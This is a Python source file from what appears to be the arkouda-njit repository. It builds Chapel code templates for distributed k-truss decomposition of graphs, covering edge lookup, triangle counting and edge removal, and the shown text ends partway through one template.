| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
29bb6f75c40b91ffe3ff19c390d38b1f39b693c4
| 493,658
|
py
|
Python
|
server/GenTrussMsg.py
|
Bears-R-Us/arkouda-njit
|
9c957797852747b907736f76cc51191c578069ea
|
[
"MIT"
] | 2
|
2022-02-08T23:13:09.000Z
|
2022-02-09T18:47:07.000Z
|
server/GenTrussMsg.py
|
Bears-R-Us/arkouda-njit
|
9c957797852747b907736f76cc51191c578069ea
|
[
"MIT"
] | 1
|
2022-03-04T02:24:04.000Z
|
2022-03-04T02:24:04.000Z
|
server/GenTrussMsg.py
|
Bears-R-Us/arkouda-njit
|
9c957797852747b907736f76cc51191c578069ea
|
[
"MIT"
] | 2
|
2022-03-23T19:21:23.000Z
|
2022-03-27T23:56:53.000Z
|
Parameters='''(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{'''
ParametersAtomic='''(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] atomic int):string throws{'''
MaxParametersAtomic='''(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,
TriCount:[?D5] atomic int, EdgeDeleted:[?D6] int ):bool{
'''
FunStartVariables='''
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge: atomic int;
var k=kvalue:int;
var timer:Timer;
var largest:int;
largest=Ne;
RemovedEdge.write(0);
'''
FunStartFuncs='''
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
RemovedEdge.add(1);
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
RemovedEdge.add(1);
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
'''
FunStartPreProcessing='''
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
RemovedEdge.add(1);
// we can safely delete the edge <u,v> if the degree of u or v is less than k-1
// we also remove the self-loop like <v,v>
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
writeln("Preprocessing removed ",RemovedEdge.read(), " edges");
//writeln("After Preprocessing");
'''
# Assemble the full Chapel kernel preamble: variable declarations, helper
# procs (edge lookup / dedup), and the degree-based preprocessing pass.
FunStart=FunStartVariables+FunStartFuncs+FunStartPreProcessing
# Variant without the preprocessing pass, used by the Max*/atomic kernels.
MaxFunStartAtomic=FunStartVariables+FunStartFuncs
TimerAndWhileStart='''
timer.start();
ConFlag=true;
while (ConFlag) {
'''
ListIntersectionTriCount='''
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var uadj = new set(int, parSafe = true);
var vadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>0) ){
forall x in dst[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_iR[u];
endTmp=beginTmp+neiR[u]-1;
if ((neiR[u]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(x,u);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ( (nei[v]>0) ){
forall x in dst[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
beginTmp=start_iR[v];
endTmp=beginTmp+neiR[v]-1;
if ((neiR[v]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(x,v);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
if (! uadj.isEmpty() ){
var Count=0:int;
forall s in uadj with ( + reduce Count) {
//var e=findEdge(s,v);
if ( vadj.contains(s) ) {
Count +=1;
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
MarkDelEdges='''
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
RemovedEdge.add(SetCurF.getSize());
'''
NaiveListIntersection=TimerAndWhileStart+ListIntersectionTriCount+MarkDelEdges
SetSearchSmallTriCount='''
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var sVadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var du=nei[u]+neiR[u];
var dv=nei[v]+neiR[v];
var sV:int;
var lV:int;
var ldV:int;
if ( du<=dv ) {
sV=u; //sV is the small degree vertex
lV=v; //lV is the large degree vertex
ldV=dv; //ldV is the degree number
} else {
sV=v;
lV=u;
ldV=du;
}
// here we search from the vertex who has small degree
{
var beginTmp=start_i[sV];
var endTmp=beginTmp+nei[sV]-1;
if ((EdgeDeleted[i]==-1) && (sV!=lV) ){
if ( (nei[sV]>0) ){
forall x in dst[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(sV,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
beginTmp=start_iR[sV];
endTmp=beginTmp+neiR[sV]-1;
if ((neiR[sV]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(x,sV);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
if (! sVadj.isEmpty() ){
var Count=0:int;
forall s in sVadj with ( + reduce Count) {
var ds1=nei[s]+neiR[s];
var e:int;
if (ds1<ldV) {
e=findEdge(s,lV);
} else {
e=findEdge(lV,s);
}
if ( (e!=-1) && (e!=i) ) {
if ( EdgeDeleted[e]==-1) {
Count +=1;
}
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if EdgeDeleted[i]==-1
}// end of triangle counting
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
NaiveSetSearchSmall= TimerAndWhileStart+SetSearchSmallTriCount+MarkDelEdges
SetSearchSmallSeqTriCount='''
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var sVadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var du=nei[u]+neiR[u];
var dv=nei[v]+neiR[v];
var sV:int;
var lV:int;
var ldV:int;
if ( du<=dv ) {
sV=u; //sV is the small degree vertex
lV=v; //lV is the large degree vertex
ldV=dv; //ldV is the degree number
} else {
sV=v;
lV=u;
ldV=du;
}
// here we search from the vertex who has small degree
{
var beginTmp=start_i[sV];
var endTmp=beginTmp+nei[sV]-1;
if ((EdgeDeleted[i]==-1) && (sV!=lV) ){
if ( (nei[sV]>0) ){
for x in dst[beginTmp..endTmp] {
var e=exactEdge(sV,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
beginTmp=start_iR[sV];
endTmp=beginTmp+neiR[sV]-1;
if ((neiR[sV]>0) ){
for x in dstR[beginTmp..endTmp] {
var e=exactEdge(x,sV);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
if (! sVadj.isEmpty() ){
var Count=0:int;
for s in sVadj {
var ds1=nei[s]+neiR[s];
var e:int;
if (ds1<ldV) {
e=findEdge(s,lV);
} else {
e=findEdge(lV,s);
}
if ( (e!=-1) && (e!=i) ) {
if ( EdgeDeleted[e]==-1) {
Count +=1;
}
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if EdgeDeleted[i]==-1
}// end of triangle counting
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
NaiveSetSearchSmallSeq=TimerAndWhileStart+SetSearchSmallSeqTriCount+MarkDelEdges
PathMergeTriCount='''
// first we calculate the number of triangles
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge {
TriCount[i]=0;
var u = src[i];
var v = dst[i];
var beginUf=start_i[u];
var endUf=beginUf+nei[u]-1;
var beginUb=start_iR[u];
var endUb=beginUb+neiR[u]-1;
var beginVf=start_i[v];
var endVf=beginVf+nei[v]-1;
var beginVb=start_iR[v];
var endVb=beginVb+neiR[v]-1;
var iu:int;
var jv:int;
var eu:int;
var ev:int;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
iu=beginUf;
jv=beginVf;
//writeln("Enter while 1 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUf) && (jv<=endVf)) {
if ( (EdgeDeleted[iu] !=-1) || (dst[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[jv]!=-1) || (dst[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dst[jv]!=u) && (dst[iu]!=v) && ( EdgeDeleted[iu] ==-1) && (EdgeDeleted[jv]==-1) ) {
{
if dst[iu]==dst[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dst[iu]<dst[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUf;
jv=beginVb;
//writeln("Enter while 2 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUf) && (jv<=endVb)) {
if ( (EdgeDeleted[iu] !=-1) || (dst[iu]==v) ) {
iu+=1;
continue;
}
ev=findEdge(dstR[jv],v);
if ( (EdgeDeleted[ev]!=-1) || (dstR[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dstR[jv]!=u) && (dst[iu]!=v) && ( EdgeDeleted[iu] ==-1) && (EdgeDeleted[ev]==-1) ) {
{
if dst[iu]==dstR[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dst[iu]<dstR[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUb;
jv=beginVf;
//writeln("Enter while 3 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUb) && (jv<=endVf)) {
eu=findEdge(dstR[iu],u);
if ( (EdgeDeleted[eu] !=-1) || (dstR[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[jv]!=-1) || (dst[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dst[jv]!=u) && (dstR[iu]!=v) && ( EdgeDeleted[eu] ==-1) && (EdgeDeleted[jv]==-1) ) {
{
if dstR[iu]==dst[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dstR[iu]<dst[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUb;
jv=beginVb;
//writeln("Enter while 4 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUb) && (jv<=endVb)) {
eu=findEdge(dstR[iu],u);
ev=findEdge(dstR[jv],v);
if ( (EdgeDeleted[eu] !=-1) || (dstR[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[ev]!=-1) || (dstR[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dstR[jv]!=u) && (dstR[iu]!=v) && ( EdgeDeleted[eu] ==-1) && (EdgeDeleted[ev]==-1) ) {
{
if dstR[iu]==dstR[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dstR[iu]<dstR[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
NaivePathMerge=TimerAndWhileStart+PathMergeTriCount+MarkDelEdges
MinSearchTriCount='''
// first we calculate the number of triangles using mininum search method.
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
var Count:int;
Count=0;
if (EdgeDeleted[i]==-1) {
TriCount[i]=0;
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (+ reduce Count){
//forall j in nextStart..nextEnd with (ref SetNextF){
//for j in nextStart..nextEnd {
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]==-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
//TriCount[i]+=1;
Count+=1;
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (+ reduce Count ){
//forall j in nextStart..nextEnd with (ref SetNextF){
//forall j in nextStart..nextEnd {
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1!=-1) {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
//TriCount[i]+=1;
Count+=1;
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of triangle counting
}// i is an undeleted edge
TriCount[i]=Count;
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
# NOTE(review): removed a stale, unassigned triple-quoted duplicate of
# MinSearchTriCount that sat here as dead code — a bare string-literal
# expression at module level has no runtime effect and was never used.
# Its only differences from MinSearchTriCount were a missing
# `TriCount[i]=0;` reset and an atomic `TriCount[i].write(Count)` store;
# the live atomic variant is kept as MinSearchTriCountAtomic.
NaiveMinSearch=TimerAndWhileStart+MinSearchTriCount+MarkDelEdges
TimerAndNoWhileStart='''
timer.start();
//while (ConFlag) {
{
'''
MinSearchTriCountAtomic='''
// first we calculate the number of triangles using mininum search method.
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
var Count:int;
Count=0;
if (EdgeDeleted[i]==-1) {
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (+ reduce Count){
//forall j in nextStart..nextEnd with (ref SetNextF){
//for j in nextStart..nextEnd {
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]==-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
Count+=1;
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (+ reduce Count ){
//forall j in nextStart..nextEnd with (ref SetNextF){
//forall j in nextStart..nextEnd {
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1!=-1) {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
//TriCount[i]+=1;
Count+=1;
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of triangle counting
}// i is an undeleted edge
TriCount[i].write(Count);
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
# Chapel fragment: closes the counting block, then opens the removal while-loop
# that marks every live edge with support < k-2 as deleted (value 1-k) and
# queues it in SetCurF for affected-edge processing.
WhileAndAffectEdgeRemoveStart='''
}
//writeln("after Triangle coutning");
ConFlag=true;
while (ConFlag) {
// here we mark the edges whose number of triangles is less than k-2 as 1-k
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
'''
MinSearchAffectedEdgeRemoval='''
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<=dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
TriCount[j].sub(1);
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
TriCount[j].sub(1);
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1!=-1) {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
TriCount[tmpe].sub(1);
TriCount[e1].sub(1);
} else {
if ((EdgeDeleted[e1]==-1) && (i<tmpe)) {
TriCount[e1].sub(1);
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<e1)) {
TriCount[tmpe].sub(1);
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of affected edge search
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
RemovedEdge.add(SetCurF.getSize());
//writeln("In ", tmpN2, " iteraton,", SetCurF.getSize(), " edges have been removed");
SetCurF.clear();
// then we try to remove the affected edges
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
tmpN2+=1;
SetNextF.clear();
}// end of while
'''
# Chapel body for the atomic min-search k-truss variant.
TrussAtomic=TimerAndNoWhileStart+MinSearchTriCountAtomic+WhileAndAffectEdgeRemoveStart+MinSearchAffectedEdgeRemoval
MixMinSearchTriCountAtomic='''
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
forall x in dst[beginTmp..endTmp] {
var e=exactEdge(u,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
// wedge case i<e, u->v, u->x
if (e3!=-1) {
if (EdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
forall j in beginTmp..endTmp {
var x=dst[j];
if ((EdgeDeleted[j] ==-1) && (x !=u) && (i<j)) {
var e3=exactEdge(x,u);
if (e3!=-1) {
if ((EdgeDeleted[e3]==-1) && (i<e3)) {
// cycle case i<j,i<e3, u->v->x->u
TriCount[i].add(1);
TriCount[j].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
# NOTE(review): this triple-quoted literal is NOT assigned to any name, so it is
# an inert expression statement — effectively disabled code kept for reference.
# Assign it to a variable (or delete it) if it is meant to be used again.
'''
ConFlag=true;
while (ConFlag) {
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
'''
MixMinSearchAffectedEdgeRemoval='''
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
//v1->v2, v1->v4
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
